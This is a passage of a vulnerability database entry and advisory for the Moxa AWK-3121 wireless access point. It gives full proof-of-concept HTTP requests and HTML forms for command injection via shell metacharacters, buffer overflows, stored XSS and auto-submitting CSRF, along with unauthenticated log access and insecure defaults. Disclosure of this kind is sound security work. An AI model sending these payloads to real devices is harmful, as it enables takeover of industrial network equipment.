[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can change the name of the device. The POST parameter "iw_board_deviceName" is susceptible to this injection.
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters.
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0781",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 2.4,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"db": "NVD",
"id": "CVE-2018-10691"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10691"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10691",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10691",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-23549",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-120476",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10691",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10691",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-23549",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-319",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120476",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10691",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "VULHUB",
"id": "VHN-120476"
},
{
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"db": "NVD",
"id": "CVE-2018-10691"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization. Moxa AWK-3121 The device contains an access control vulnerability.Information may be obtained. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. An access control error vulnerability exists in Moxa\u0027s AWK-31211.14 release. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n This allows an attacker who is able to execute a cross-site\n scripting attack to steal the cookie very easily. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. The POST parameter \"srvName\" is susceptible to a buffer\n overflow. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. The POST parameters\n \"to1,to2,to3,to4\" are all susceptible to buffer overflow. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. However, this interface is not protected against\n CSRF attacks, which allows an attacker to trick an administrator into\n executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and\n forms/webSetMainRestart URIs. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. The POST parameter \"srvName\" is susceptible to this\n injection. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. The POST parameter \"iw_privatePass\"\n is susceptible to this injection. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. It\n provides functionality so that an administrator can change the\n name of the device. The POST parameter\n \"iw_board_deviceName\" is susceptible to this injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. The POST parameter \"iw_filename\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and 